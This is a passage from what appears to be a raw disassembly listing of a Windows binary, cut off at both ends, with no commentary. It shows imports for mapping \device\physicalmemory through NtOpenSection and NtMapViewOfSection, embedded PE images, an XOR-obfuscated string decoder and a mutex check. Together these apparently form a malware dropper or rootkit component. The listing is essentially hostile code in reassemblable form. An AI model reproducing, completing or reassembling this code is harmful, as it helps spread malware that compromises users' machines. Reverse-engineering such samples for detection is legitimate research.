; "Process32Next"
off_41ADB4 dd offset aKernel32_dll ; DATA XREF: sub_401EAF+84�r
; "kernel32.dll"
off_41ADB8 dd offset word_41A952 ; DATA XREF: sub_401E23+78�r
byte_41ADBC db 0 ; DATA XREF: sub_401EAF+49�r
; sub_401EAF+66�r
align 10h
dd offset dword_41A874+4
dd offset aNtdll_dll ; "ntdll.dll"
dd offset loc_41A891
dd 1, 41A7F1h, 41AD5Bh, 41A7FFh, 1, 41A770h, 41AD5Bh, 41A77Eh
dd 2, 41AA69h, 41AD72h, 41AA75h, 1, 41AA01h, 41AD72h, 41AA0Dh
dd 0
dd offset dword_41AAD4+3
dd offset aAdvapi32_dll ; "advapi32.dll"
dd offset loc_41AAE5
dd 1, 41AB7Bh, 41AD72h, 41AB89h, 0
dd offset dword_41AC14+5
dd offset aAdvapi32_dll ; "advapi32.dll"
dd offset loc_41AC27
dd 1, 41ACBDh, 41AD72h, 41ACCBh, 5 dup(0)
aRtlinitunicode db 'RtlInitUnicodeString',0 ; DATA XREF: sub_4019A1+D�o
aNtunmapviewofs db 'NtUnmapViewOfSection',0 ; DATA XREF: sub_4019A1+1D�o
aNtopensection db 'NtOpenSection',0 ; DATA XREF: sub_4019A1+2D�o
aNtmapviewofsec db 'NtMapViewOfSection',0 ; DATA XREF: sub_4019A1+3D�o
aRtlntstatustod db 'RtlNtStatusToDosError',0 ; DATA XREF: sub_4019A1+4D�o
aCurrent_user db 'CURRENT_USER',0 ; DATA XREF: sub_401A00+4D�o
align 10h
aDevicePhysical: ; DATA XREF: sub_401A00+8�o
unicode 0, <\device\physicalmemory>,0
aWcscmp db 'wcscmp',0 ; DATA XREF: .data:off_41AF78�o
aHtons db 'htons',0
aVirtualprotect db 'VirtualProtect',0
aGetcurrentproc db 'GetCurrentProcessId',0
aFindwindowa db 'FindWindowA',0
aSendmessagea db 'SendMessageA',0
aIsbadreadptr db 'IsBadReadPtr',0
aGlobalfindatom db 'GlobalFindAtomA',0
aGlobalfindat_0 db 'GlobalFindAtomW',0
byte_41AF74 db 3 ; DATA XREF: sub_401B3E+68�r
align 4
off_41AF78 dd offset aWcscmp ; DATA XREF: sub_401B3E+CF�r
; sub_401B3E+118�r
; "wcscmp"
off_41AF7C dd offset aNtdll_dll ; DATA XREF: sub_401B3E+BC�r
; "ntdll.dll"
dd 5, 41AF05h, 41AD99h, 7, 41AF0Bh, 41AD5Bh, 8, 41AF1Ah
dd 41AD5Bh, 9, 41AF2Eh, 41ADA5h, 0Ah, 41AF3Ah, 41ADA5h
dd 0Bh, 41AF47h, 41AD5Bh, 0Ch, 41AF54h, 41AD5Bh, 0Dh, 41AF64h
dd 41AD5Bh
dword_41AFE0 dd 905A4Dh, 3, 4, 0FFFFh, 0B8h, 0 dd 40h, 8 dup(0)
dd 80h, 0EBA1F0Eh, 0CD09B400h, 4C01B821h, 685421CDh, 70207369h
dd 72676F72h, 63206D61h, 6F6E6E61h, 65622074h, 6E757220h
dd 206E6920h, 20534F44h, 65646F6Dh, 0A0D0D2Eh, 24h, 0
dd 4550h, 7014Ch, 427CB50Ah, 2 dup(0)
dd 210E00E0h, 3702010Bh, 800h, 0C00h, 1000h, 1190h, 1000h
dd 2000h, 10000000h, 1000h, 200h, 1, 0
dd 4, 0
dd 8000h, 400h, 0
dd 2, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 7000h, 48h, 5000h, 37Ch, 6 dup(0)
dd 6000h, 0DCh, 3000h, 54h, 12h dup(0)
a_text db '.text',0
align 10h
db '¼',7,0
align 4
dd 1000h, 7BCh, 400h, 3 dup(0)
dd 60000020h, 7373622Eh, 0
dd 0FE0h, 2000h, 5 dup(0)
dd 0C0000080h, 6164722Eh, 6174h, 54h, 3000h, 54h, 0C00h
dd 3 dup(0)
dd 40000020h, 7461642Eh, 61h, 0C4h, 4000h, 0C4h, 0E00h
dd 3 dup(0)
dd 0C0000040h, 6164692Eh, 6174h, 37Ch, 5000h, 37Ch, 1000h
dd 3 dup(0)
dd 0C0000060h, 6C65722Eh, 636Fh, 0E4h, 6000h, 0E4h, 1600h
dd 3 dup(0)
dd 2000020h, 6164652Eh, 6174h, 48h, 7000h, 48h, 1800h
dd 3 dup(0)
dd 40000020h, 5Ch dup(0)
dd 8B40C031h, 0F704244Ch, 60441h, 0F740000h, 824448Bh
dd 1024548Bh, 3B80289h, 0C3000000h
; =============== S U B R O U T I N E =======================================
sub_41B400 proc near ; CODE XREF: .data:0041B528�p
; .data:0041B556�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push 10001000h
push large dword ptr fs:0
mov large fs:0, esp
loc_41B41D: ; CODE XREF: sub_41B400+44�j
; sub_41B400+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_41B44C
cmp esi, [esp+1Ch+arg_4]
jz short loc_41B44C
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_41B41D
call dword ptr [ebx+esi*4+8]
jmp short loc_41B41D
; ---------------------------------------------------------------------------
loc_41B44C: ; CODE XREF: sub_41B400+2A�j
; sub_41B400+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_41B400 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B45A proc near ; CODE XREF: .data:0041B51B�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push 10001092h
push [ebp+arg_0]
call sub_41BAF4
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41B45A endp
; ---------------------------------------------------------------------------
db 0FCh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+0Ch]
mov eax, [ebp+8]
test dword ptr [eax+4], 6
jnz loc_41B54F
mov [ebp-8], eax
mov eax, [ebp+10h]
mov [ebp-4], eax
lea eax, [ebp-8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_41B4AD: ; CODE XREF: .data:0041B546�j
cmp esi, 0FFFFFFFFh
jz loc_41B55E
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_41B53D
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp-14h]
mov eax, [eax]
mov eax, [eax]
mov ds:10004034h, eax
mov edx, [ebp-14h]
mov eax, [edx]
mov ds:10004038h, eax
mov eax, [edx+4]
mov ds:1000403Ch, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, ds:10004040h
mov esi, ds:10004038h
rep movsd
lea edi, ds:10004040h
mov ds:10004038h, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+0Ch]
or eax, eax
jz short loc_41B53D
js short loc_41B54B
mov edi, [ebx+8]
push ebx
call sub_41B45A
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_41B400
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_41B53D: ; CODE XREF: .data:0041B4BE�j
; .data:0041B513�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_41B4AD
; ---------------------------------------------------------------------------
loc_41B54B: ; CODE XREF: .data:0041B515�j
xor eax, eax
jmp short loc_41B568
; ---------------------------------------------------------------------------
loc_41B54F: ; CODE XREF: .data:0041B492�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_41B400
add esp, 0Ch
loc_41B55E: ; CODE XREF: .data:0041B4B0�j
push 0Bh
call sub_41BB60
add esp, 4
loc_41B568: ; CODE XREF: .data:0041B54D�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
cmp dword ptr [ebp+0Ch], 1
jnz short loc_41B581
call sub_41B5A4
loc_41B581: ; CODE XREF: .data:0041B57A�j
call sub_41BA53
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
mov eax, ds:10004000h
call eax
pop edi
pop esi
pop ebx
leave
retn 0Ch
; ---------------------------------------------------------------------------
db 0B8h, 1, 0
dd 0F2EB0000h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B5A4 proc near ; CODE XREF: .data:0041B57C�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
push 0
push 0FFFFFFF6h
call sub_41BB18
mov [ebp+var_8], eax
push 0
push 0FFFFFFF5h
call sub_41BB18
mov [ebp+var_4], eax
push 0
push 0FFFFFFF4h
call sub_41BB18
mov [ebp+var_C], eax
push 1000401Eh
push [ebp+var_8]
call sub_41BB0C
mov ds:10004008h, eax
push 1000401Ch
push [ebp+var_4]
call sub_41BB0C
mov ds:10004004h, eax
push 1000401Ch
push [ebp+var_C]
call sub_41BB0C
add esp, 30h
mov ds:1000400Ch, eax
mov edi, ds:10004004h
or edi, edi
jz short loc_41B61D
push 0
push edi
call sub_41BB6C
add esp, 8
loc_41B61D: ; CODE XREF: sub_41B5A4+6C�j
mov edi, ds:1000400Ch
or edi, edi
jz short loc_41B637
push 0
push edi
call sub_41BB6C
add esp, 8
call sub_41B63C
loc_41B637: ; CODE XREF: sub_41B5A4+81�j
pop edi
leave
retn
sub_41B5A4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B63C proc near ; CODE XREF: sub_41B5A4+8E�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp+var_C], 0
call sub_41BA88
mov ebx, eax
mov [ebp+var_10], ebx
jmp short loc_41B679
; ---------------------------------------------------------------------------
loc_41B658: ; CODE XREF: sub_41B63C+45�j
cmp byte ptr ds:0[ebx], 3Dh
jz short loc_41B665
inc [ebp+var_C]
loc_41B665: ; CODE XREF: sub_41B63C+24�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
lea ebx, [ebx+edi]
loc_41B679: ; CODE XREF: sub_41B63C+1A�j
cmp byte ptr ds:0[ebx], 0
jnz short loc_41B658
mov edi, [ebp+var_C]
inc edi
lea edi, ds:0[edi*4]
mov [ebp+var_14], edi
push [ebp+var_14]
call sub_41BB3C
pop ecx
mov [ebp+var_8], eax
mov ds:10004010h, eax
cmp [ebp+var_8], 0
jnz short loc_41B6AC
xor eax, eax
jmp short loc_41B722
; ---------------------------------------------------------------------------
loc_41B6AC: ; CODE XREF: sub_41B63C+6A�j
mov ebx, [ebp+var_10]
jmp short loc_41B705
; ---------------------------------------------------------------------------
loc_41B6B1: ; CODE XREF: sub_41B63C+D1�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
mov [ebp+var_4], edi
cmp byte ptr ds:0[ebx], 3Dh
jz short loc_41B6FF
push [ebp+var_4]
call sub_41BB3C
pop ecx
mov esi, [ebp+var_8]
mov ds:0[esi], eax
or eax, eax
jnz short loc_41B6E8
jmp short loc_41B722
; ---------------------------------------------------------------------------
loc_41B6E8: ; CODE XREF: sub_41B63C+A8�j
push ebx
mov edi, [ebp+var_8]
push dword ptr ds:0[edi]
call sub_41BB90
add esp, 8
add [ebp+var_8], 4
loc_41B6FF: ; CODE XREF: sub_41B63C+91�j
mov edx, [ebp+var_4]
lea ebx, [ebx+edx]
loc_41B705: ; CODE XREF: sub_41B63C+73�j
cmp byte ptr ds:0[ebx], 0
jnz short loc_41B6B1
mov edx, [ebp+var_8]
mov dword ptr ds:0[edx], 0
mov eax, 1
loc_41B722: ; CODE XREF: sub_41B63C+6E�j
; sub_41B63C+AA�j
pop edi
pop esi
pop ebx
leave
retn
sub_41B63C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B728 proc near ; CODE XREF: sub_41B7D2+22�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 181h
push esi
push [ebp+arg_0]
mov eax, ds:10004098h
lea eax, ds:10002000h[eax]
push eax
call sub_41BB48
add esp, 0Ch
xor edi, edi
jmp short loc_41B771
; ---------------------------------------------------------------------------
loc_41B757: ; CODE XREF: sub_41B728+4B�j
mov eax, ds:10004098h
add eax, edi
lea eax, ds:10002000h[eax]
movsx edx, byte ptr [eax]
xor edx, 0D9h
mov [eax], dl
inc edi
loc_41B771: ; CODE XREF: sub_41B728+2D�j
cmp edi, esi
jl short loc_41B757
mov [ebp+var_8], 389h
mov eax, ds:10004098h
add eax, esi
mov byte ptr ds:10002000h[eax], 0
xor edi, edi
mov edi, ds:10004098h
add dword ptr ds:10004098h, 3
mov eax, ds:10004098h
lea eax, [eax+esi+4]
mov ds:10004098h, eax
inc dword ptr ds:10004098h
cmp dword ptr ds:10004098h, 0DB6h
jle short loc_41B7C1
and dword ptr ds:10004098h, 0
loc_41B7C1: ; CODE XREF: sub_41B728+90�j
mov [ebp+var_C], 9Ch
lea eax, [edi+10002000h]
pop edi
pop esi
leave
retn
sub_41B728 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B7D2 proc near ; CODE XREF: .data:0041B96B�p
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
lea edi, [ebp+var_5]
lea esi, ds:1000409Ch
xor ecx, ecx
inc ecx
rep movsb
call sub_41BAC4
push 5
push 100040BDh
call sub_41B728
add esp, 8
push eax
push 0
push 1F0001h
call sub_41BAE8
mov [ebp+var_4], eax
or eax, eax
jz short loc_41B82D
mov [ebp+var_C], 4FA1h
inc [ebp+var_C]
push eax
call sub_41BAA0
mov [ebp+var_E], 6C6Dh
inc [ebp+var_E]
xor eax, eax
inc eax
loc_41B82D: ; CODE XREF: sub_41B7D2+3C�j
pop edi
pop esi
leave
retn
sub_41B7D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B831 proc near ; CODE XREF: .data:0041B99F�p
var_10A = byte ptr -10Ah
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
call sub_41BA7C
call sub_41BAAC
mov ecx, edi
or eax, 0FFFFFFFFh
loc_41B84F: ; CODE XREF: sub_41B831+23�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41B84F
mov ebx, eax
mov [ebp+var_6], bx
mov ax, [ebp+var_6]
mov [ebp+var_2], ax
jmp short loc_41B884
; ---------------------------------------------------------------------------
loc_41B866: ; CODE XREF: sub_41B831+59�j
movzx eax, [ebp+var_2]
cmp byte ptr [edi+eax], 5Ch
jnz short loc_41B880
call sub_41BA70
inc [ebp+var_2]
call sub_41BAC4
jmp short loc_41B88C
; ---------------------------------------------------------------------------
loc_41B880: ; CODE XREF: sub_41B831+3D�j
dec [ebp+var_2]
loc_41B884: ; CODE XREF: sub_41B831+33�j
movzx eax, [ebp+var_2]
or eax, eax
jg short loc_41B866
loc_41B88C: ; CODE XREF: sub_41B831+4D�j
mov ax, [ebp+var_2]
cmp ax, [ebp+var_6]
jnb short loc_41B8CA
mov [ebp+var_4], 0
jmp short loc_41B8B8
; ---------------------------------------------------------------------------
loc_41B89E: ; CODE XREF: sub_41B831+97�j
movzx eax, [ebp+var_4]
movzx edx, [ebp+var_2]
mov ecx, eax
add ecx, edx
mov dl, [edi+ecx]
mov [ebp+eax+var_10A], dl
inc [ebp+var_4]
loc_41B8B8: ; CODE XREF: sub_41B831+6B�j
movzx eax, [ebp+var_4]
movzx edx, [ebp+var_6]
movzx ecx, [ebp+var_2]
sub edx, ecx
cmp eax, edx
jle short loc_41B89E
loc_41B8CA: ; CODE XREF: sub_41B831+63�j
mov esi, 6BBCh
add esi, 7D41h
lea eax, [ebp+var_10A]
push eax
call sub_41BADC
call sub_41BAD0
pop edi
pop esi
pop ebx
leave
retn
sub_41B831 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B8EB proc near ; CODE XREF: .data:0041B9F2�p
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
call sub_41BA7C
push 100040BBh
push [ebp+arg_0]
call sub_41BB84
add esp, 8
lea edi, [ebp+var_8]
lea esi, ds:1000409Dh
movsd
movsd
pop edi
pop esi
leave
retn
sub_41B8EB endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 21Ch
push esi
push edi
mov ax, ds:100040A5h
mov [ebp-217h], ax
mov eax, ds:10004094h
add eax, 698h
push eax
call sub_41BB78
mov byte ptr [ebp-100h], 84h
sub byte ptr [ebp-100h], 68h
mov eax, ds:10004090h
mov edx, eax
add edx, 5
push edx
mov edx, 0Fh
sub edx, ds:10004094h
push edx
mov edx, 4
sub edx, eax
push edx
call sub_41B7D2
add esp, 10h
or eax, eax
jz short loc_41B97F
xor eax, eax
inc eax
jmp loc_41BA28
; ---------------------------------------------------------------------------
loc_41B97F: ; CODE XREF: .data:0041B975�j
push 104h
lea eax, [ebp-205h]
push eax
push dword ptr [ebp+8]
call sub_41BA94
call sub_41BA7C
lea eax, [ebp-205h]
push eax
call sub_41B831
mov byte ptr [ebp-101h], 1Bh
add byte ptr [ebp-101h], 1
lea edi, [ebp-215h]
lea esi, ds:100040A7h
mov ecx, 4
rep movsd
push 0FFh
lea eax, [ebp-0FFh]
push eax
call sub_41BAB8
mov eax, ds:100040B7h
mov [ebp-21Bh], eax
call sub_41BA7C
call sub_41BA70
lea eax, [ebp-0FFh]
push eax
call sub_41B8EB
call sub_41BAC4
lea eax, [ebp-215h]
push eax
lea eax, [ebp-0FFh]
push eax
call sub_41BB84
add esp, 10h
push 1
lea eax, [ebp-0FFh]
push eax
call sub_41BB00
call sub_41BAAC
xor eax, eax
inc eax
loc_41BA28: ; CODE XREF: .data:0041B97A�j
pop edi
pop esi
leave
retn 0Ch
; ---------------------------------------------------------------------------
align 10h
dd 243CD950h, 0F24048Bh, 82434BAh, 240C8166h
db 0, 2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41BA53
loc_41BA42: ; CODE XREF: sub_41BA53+D�j
fldcw word ptr [esp+4+var_4]
pop ecx
mov al, ah
and eax, 3
retn
; END OF FUNCTION CHUNK FOR sub_41BA53
; ---------------------------------------------------------------------------
dd 243CD950h
db 58h, 0EBh, 0F3h
; =============== S U B R O U T I N E =======================================
sub_41BA53 proc near ; CODE XREF: .data:loc_41B581�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0041BA42 SIZE 0000000A BYTES
push eax
fnstcw word ptr [esp+4+var_4]
mov eax, [esp+4+var_4]
or word ptr [esp+4+var_4], 300h
jmp short loc_41BA42
sub_41BA53 endp
; ---------------------------------------------------------------------------
align 4
dd 50E825FFh, 90901000h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41BA70 proc near ; CODE XREF: sub_41B831+3F�p
; .data:0041B9E6�p
jmp dword ptr ds:100050ECh
sub_41BA70 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41BA7C proc near ; CODE XREF: sub_41B831+F�p
; sub_41B8EB+7�p ...
jmp dword ptr ds:100050F0h
sub_41BA7C endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41BA88 proc near ; CODE XREF: sub_41B63C+10�p
jmp dword ptr ds:100050F4h
sub_41BA88 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41BA94 proc near ; CODE XREF: .data:0041B98E�p
jmp dword ptr ds:100050F8h
sub_41BA94 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41BAA0 proc near ; CODE XREF: sub_41B7D2+49�p
jmp dword ptr ds:100050FCh
sub_41BAA0 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41BAAC proc near ; CODE XREF: sub_41B831+14�p
; .data:0041BA20�p
jmp dword ptr ds:10005100h
sub_41BAAC endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41BAB8 proc near ; CODE XREF: .data:0041B9D1�p
jmp dword ptr ds:10005104h
sub_41BAB8 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41BAC4 proc near ; CODE XREF: sub_41B7D2+16�p
; sub_41B831+48�p ...
jmp dword ptr ds:10005108h
sub_41BAC4 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41BAD0 proc near ; CODE XREF: sub_41B831+B0�p
jmp dword ptr ds:1000510Ch
sub_41BAD0 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41BADC proc near ; CODE XREF: sub_41B831+AB�p
jmp dword ptr ds:10005110h
sub_41BADC endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41BAE8 proc near ; CODE XREF: sub_41B7D2+32�p
jmp dword ptr ds:10005114h
sub_41BAE8 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41BAF4 proc near ; CODE XREF: sub_41B45A+13�p
jmp dword ptr ds:10005118h
sub_41BAF4 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41BB00 proc near ; CODE XREF: .data:0041BA1B�p
jmp dword ptr ds:1000511Ch
sub_41BB00 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41BB0C proc near ; CODE XREF: sub_41B5A4+33�p
; sub_41B5A4+45�p ...
jmp dword ptr ds:10005128h
sub_41BB0C endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41BB18 proc near ; CODE XREF: sub_41B5A4+B�p
; sub_41B5A4+17�p ...
jmp dword ptr ds:1000512Ch
sub_41BB18 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
dd 513025FFh, 90901000h, 0
dd 513425FFh, 90901000h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41BB3C proc near ; CODE XREF: sub_41B63C+58�p
; sub_41B63C+96�p
jmp dword ptr ds:10005138h
sub_41BB3C endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41BB48 proc near ; CODE XREF: sub_41B728+23�p
jmp dword ptr ds:1000513Ch
sub_41BB48 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
dd 514025FFh, 90901000h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41BB60 proc near ; CODE XREF: .data:0041B560�p
jmp dword ptr ds:10005144h
sub_41BB60 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41BB6C proc near ; CODE XREF: sub_41B5A4+71�p
; sub_41B5A4+86�p
jmp dword ptr ds:10005148h
sub_41BB6C endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41BB78 proc near ; CODE XREF: .data:0041B939�p
jmp dword ptr ds:1000514Ch
sub_41BB78 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41BB84 proc near ; CODE XREF: sub_41B8EB+14�p
; .data:0041BA0A�p
jmp dword ptr ds:10005150h
sub_41BB84 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41BB90 proc near ; CODE XREF: sub_41B63C+B7�p
jmp dword ptr ds:10005154h
sub_41BB90 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 14h dup(0)
dd 2 dup(1), 7Ch dup(0)
dd 10001536h, 5 dup(0)
dd 7325h, 720077h, 1Ch dup(0)
dd 2, 0Ch, 0
dd 3B4E2A00h, 734D3E5Ah
db 0, 4Bh, 0
aAbcdefghijklmn db 'abcdefghijklmno',0 ; DATA XREF: sub_40284A+1C2�o
aAy db 'Ay&',0
db '\',0
aTtii db '’’ˆë»',0
align 4
dd 4Fh dup(0)
dd 5070h, 2 dup(0)
dd 52F8h, 50E8h, 50B0h, 2 dup(0)
dd 5340h, 5128h, 12h dup(0)
dd 515Ch, 516Ch, 5184h, 519Ch, 51B8h, 51D0h, 51E0h, 51F4h
dd 520Ch, 521Ch, 522Ch, 5240h, 5250h, 525Ch, 2 dup(0)
dd 5268h, 5274h, 5288h, 5294h, 52A0h, 52ACh, 52B8h, 52C4h
dd 52CCh, 52D8h, 52E0h, 52ECh, 2 dup(0)
dd 515Ch, 516Ch, 5184h, 519Ch, 51B8h, 51D0h, 51E0h, 51F4h
dd 520Ch, 521Ch, 522Ch, 5240h, 5250h, 525Ch, 2 dup(0)
dd 5268h, 5274h, 5288h, 5294h, 52A0h, 52ACh, 52B8h, 52C4h
dd 52CCh, 52D8h, 52E0h, 52ECh, 0
dd 78450081h, 72507469h, 7365636Fh, 73h, 654700DEh, 72754374h
dd 746E6572h, 636F7250h, 49737365h, 64h, 654700E0h, 72754374h
dd 746E6572h, 65726854h, 64496461h, 0
dd 654700EDh, 766E4574h, 6E6F7269h, 746E656Dh, 69727453h
dd 4173676Eh, 0
dd 6547010Ah, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 0
dd 6C43001Bh, 4865736Fh, 6C646E61h, 65h, 65470124h, 6F725074h
dd 73736563h, 70616548h, 0
dd 6547013Fh, 73795374h, 446D6574h, 63657269h, 79726F74h
dd 41h, 65470155h, 63695474h, 756F436Bh, 746Eh, 6547015Ch
dd 72655674h, 6E6F6973h, 0
dd 6C470168h, 6C61626Fh, 41646441h, 416D6F74h, 0
dd 704F01D2h, 754D6E65h, 41786574h, 0
dd 7452020Eh, 776E556Ch, 646E69h, 69570298h, 6578456Eh
dd 63h, 665F0080h, 65706F64h, 6Eh, 6F5F014Fh, 5F6E6570h
dd 6866736Fh, 6C646E61h, 65h, 6366020Dh, 65736F6Ch, 0
dd 635F0039h, 74697865h, 0
dd 616D024Eh, 636F6C6Ch, 0
dd 656D0254h, 7970636Dh, 0
dd 7270025Bh, 66746E69h, 0
dd 61720260h, 657369h, 65730267h, 66756274h, 0
dd 7273026Fh, 646E61h, 74730271h, 74616372h, 0
dd 74730275h, 79706372h, 0
aKernel32_dll_2 db 'KERNEL32.DLL',0
align 4
dd 0Eh dup(10005000h), 44545243h, 442E4C4Ch, 4C4Ch, 0Ch dup(10005014h)
dd 22h dup(0)
dd 20h, 0
dd 20h, 1000h, 1800h, 2000h, 2C00h, 78h dup(0)
dd 1000h, 94h, 3086302Bh, 30F730EDh, 310D30FFh, 311B3113h
dd 31B03121h, 31FD31F0h, 320F3202h, 32243214h, 323F322Ah
dd 335F32BEh, 33783366h, 339D3381h, 33AF33A6h, 33BB33B5h
dd 33CA33C4h, 33DC33D0h, 33FF33EAh, 35183410h, 3543352Ch
dd 356D354Fh, 35DA357Eh, 368635F7h, 369E3692h, 36B636AAh
dd 36CE36C2h, 36E636DAh, 36FE36F2h, 3716370Ah, 372E3722h
dd 3746373Ah, 375E3752h, 3776376Ah, 378E3782h, 37A6379Ah
dd 37B2h, 4000h, 0Ch, 3000h, 5000h, 3Ch, 330C3308h, 33143310h
dd 331C3318h, 33243320h, 332C3328h, 33343330h, 333C3338h
dd 3350334Ch, 33583354h, 3360335Ch, 33683364h, 3370336Ch
dd 33783374h, 4Ah dup(0)
aB_0 db 0Ah
db 'µ|B',0
align 4
aP db '(p',0
align 10h
dd 3 dup(1), 7030h, 7034h, 7038h, 2E6C6C64h, 6C6C64h, 1536h
dd 703Ch, 0
a_libmain@12 db '_LibMain@12',0
dd 6Eh dup(0)
db 0
byte_41C9E1 db 4Dh, 5Ah, 90h ; DATA XREF: sub_402784+6A�o
dd 300h, 400h, 0FFFF00h, 0B800h, 0
dd 4000h, 8 dup(0)
dd 8000h, 0BA1F0E00h, 9B4000Eh, 1B821CDh, 5421CD4Ch, 20736968h
